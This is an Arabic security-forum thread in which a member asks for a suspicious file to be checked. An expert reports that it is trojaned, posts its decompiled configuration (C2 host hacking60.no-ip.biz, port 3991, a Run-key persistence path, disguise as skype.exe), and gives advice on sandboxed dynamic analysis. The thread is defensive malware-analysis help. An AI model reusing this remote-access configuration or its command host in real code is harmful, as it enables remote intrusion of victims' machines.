1. الإدارة العامة

    صفحة منتديات زيزووم للأمن والحماية

  2. الإدارة العامة

    الصفحة الرسمية لمنتديات زيزووم للأمن والحماية الفيس بوك

  3. الإدارة العامة

    الصفحة الرسمية لمنتديات زيزووم للأمن والحماية التلكرام

تم الفحص ملف للفحص

الموضوع في 'طلبات فحص الملفات' بواسطة elasrag2010, بتاريخ ‏يونيو 26, 2016.

حالة الموضوع:
مغلق
  1. elasrag2010

    elasrag2010 زيزوومى متألق

    إنضم إلينا في:
    ‏فبراير 13, 2014
    المشاركات:
    334
    الإعجابات :
    103
    نقاط الجائزة:
    450
    الجنس:
    ذكر
    الإقامة:
    الاسكندرية
    برامج الحماية:
    Microsoft Security Essentials
    نظام التشغيل:
    Windows8.1
    المصدر: ملف للفحص
    في منتدى : طلبات فحص الملفات


    السلام عليكم

    عايز افحص الملف ده ومعرفه الهوست والمعلومات !!

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:
     
  2. black007

    black007 إداري سابق وداعم للمنتدى (خبير فحص ملفات) داعــــم للمنتـــــدى ★ نجم المنتدى ★ كبار الشخصيات

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,600
    الإعجابات :
    24,170
    نقاط الجائزة:
    2,970
    الجنس:
    ذكر
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    اخى الغالى هل تتدرب على فك التغليم ام ماذا

    الملف ملغوم وهذه بياناته

    كود PHP:
    Shared Sub New()
        
    OK.VN "c2t5cGU="
        
    OK.VR "0.7d"
        
    OK.MT Nothing
        OK
    .EXE "skype.exe"
        
    OK.DR "TEMP"
        
    OK.RG "b56c06b77c5b9b75cd3c0f9fcb76e24b"
        
    OK."hacking60.no-ip.biz"
        
    OK."3991"
        
    OK."|'|'|"
        
    OK.BD Conversions.ToBoolean("False")
        
    OK.Idr Conversions.ToBoolean("True")
        
    OK.IsF Conversions.ToBoolean("True")
        
    OK.Isu Conversions.ToBoolean("True")
        
    OK.LO = New FileInfo(Assembly.GetEntryAssembly.Location)
        
    OK.= New Computer
        OK
    .kq Nothing
        OK
    .Cn False
        OK
    .sf "Software\Microsoft\Windows\CurrentVersion\Run"
        
    OK.Nothing
        OK
    .MeM = New MemoryStream
        OK
    .= New Byte(&H1401  1) {}
        
    OK.lastcap ""
        
    OK.PLG Nothing
    End Sub

     
    MagicianMiDo32 و elasrag2010 معجبون بهذا.
  3. elasrag2010

    elasrag2010 زيزوومى متألق

    إنضم إلينا في:
    ‏فبراير 13, 2014
    المشاركات:
    334
    الإعجابات :
    103
    نقاط الجائزة:
    450
    الجنس:
    ذكر
    الإقامة:
    الاسكندرية
    برامج الحماية:
    Microsoft Security Essentials
    نظام التشغيل:
    Windows8.1
    ياخوي تقدر توريني فيديو بسيط لكيف كشفت ؟؟
     
  4. black007

    black007 إداري سابق وداعم للمنتدى (خبير فحص ملفات) داعــــم للمنتـــــدى ★ نجم المنتدى ★ كبار الشخصيات

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,600
    الإعجابات :
    24,170
    نقاط الجائزة:
    2,970
    الجنس:
    ذكر
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    تفضل اخى الغالى تابع دورتنا المتواضعه هنا

    على الرغم ان لكل منا طريقته الخاصه فى استخراج البيانات

    لان ربما طريقتى لم تعجبك

    فدائما ما تختلف طريقه كشف التلغيمه على حسب نوعيه الحمايه التى تكون على الملف

    لكن ربما ستكون الدوره مفيده لك

    تفضل هنا

    http://forum.zyzoom.net/threads/223902/
     
    MagicianMiDo32 و elasrag2010 معجبون بهذا.
  5. elasrag2010

    elasrag2010 زيزوومى متألق

    إنضم إلينا في:
    ‏فبراير 13, 2014
    المشاركات:
    334
    الإعجابات :
    103
    نقاط الجائزة:
    450
    الجنس:
    ذكر
    الإقامة:
    الاسكندرية
    برامج الحماية:
    Microsoft Security Essentials
    نظام التشغيل:
    Windows8.1
    فتحتها قفلتها علطول :grin:
    قفلتني الدوره اول ما فتحتها
    شكلها طويله جداا
    استأذنك في معرفه طريقت استخراجك للبيانات لو ينفع
     
  6. black007

    black007 إداري سابق وداعم للمنتدى (خبير فحص ملفات) داعــــم للمنتـــــدى ★ نجم المنتدى ★ كبار الشخصيات

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,600
    الإعجابات :
    24,170
    نقاط الجائزة:
    2,970
    الجنس:
    ذكر
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    طيب كحل سريع استخدم MegaDumper سيخرج لك اللملف خام

    لكن عيوب الطويله يجب ان تقوم بتشغل الملف حتى تعمل له Dump
     
    MagicianMiDo32 و elasrag2010 معجبون بهذا.
  7. elasrag2010

    elasrag2010 زيزوومى متألق

    إنضم إلينا في:
    ‏فبراير 13, 2014
    المشاركات:
    334
    الإعجابات :
    103
    نقاط الجائزة:
    450
    الجنس:
    ذكر
    الإقامة:
    الاسكندرية
    برامج الحماية:
    Microsoft Security Essentials
    نظام التشغيل:
    Windows8.1
    بس لو شغلت الملف !! جهازي بيخترق ياخوي
     
  8. black007

    black007 إداري سابق وداعم للمنتدى (خبير فحص ملفات) داعــــم للمنتـــــدى ★ نجم المنتدى ★ كبار الشخصيات

    إنضم إلينا في:
    ‏يونيو 17, 2013
    المشاركات:
    4,600
    الإعجابات :
    24,170
    نقاط الجائزة:
    2,970
    الجنس:
    ذكر
    الإقامة:
    Egypt
    برامج الحماية:
    اخرى
    نظام التشغيل:
    Windows 7
    لذلك ذكرت لك لكل منا طريقته

    +

    اخى الغالى لا تستخدم جهازك الاساسه للفحص عليه

    عليك استخدام نظام وهمى مع استخدام احدى برامج التجميد

    +

    ستحتاج الى بعض ادوات لفك الحمايه برامج اساسيه

    الموضوع يطول شرحه فى سطور

    لكن قم باستخدام برنامج لانشاء انظمه الوهميه VirtualBox او VMware لعمل نظام وهمى عليه

    وبعدها قم باستخدام برنامج شادو ديفنس او ديب فريز لتجميد الجهاز

    +

    ستحتاج الى برنامج Spy The Spy لمراقبه المسارات

    برنامج لمراقبه processexplorer العمليات

    برنامج apatedns لكشف الاتصالات الخارجيه

    الطريقه التى اتبعتها انا هى التحليل الاستاتيكى + الديناميكى معا جمعت بينهما بشكل مختصر

    لكن ما اقطرحته عليك هى مجرد ادوات للتحليل الديناميكى

    للمعرفه فقط التحليل الاستاتيكى يحتاج الى خبره لا باس بها بنظام الاسمبلى والتحليل والتنقيح وبعض الغات البرمجيه

    وليس من السهل ان تتبعها

    لذلك اقطرحت عليك استخدام الطريقه الديناميكيه
     
    MagicianMiDo32 و elasrag2010 معجبون بهذا.
  9. elasrag2010

    elasrag2010 زيزوومى متألق

    إنضم إلينا في:
    ‏فبراير 13, 2014
    المشاركات:
    334
    الإعجابات :
    103
    نقاط الجائزة:
    450
    الجنس:
    ذكر
    الإقامة:
    الاسكندرية
    برامج الحماية:
    Microsoft Security Essentials
    نظام التشغيل:
    Windows8.1
    هههههه احس اني في حصه رياضه
    ديناميكا واستاتيكاا
    الله يسعدك ي غالي
    سوف اعمل المطلوب واي شئ يصعب علي تشفيره فسأضعه هناا
    تم حل الموضوع :*
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...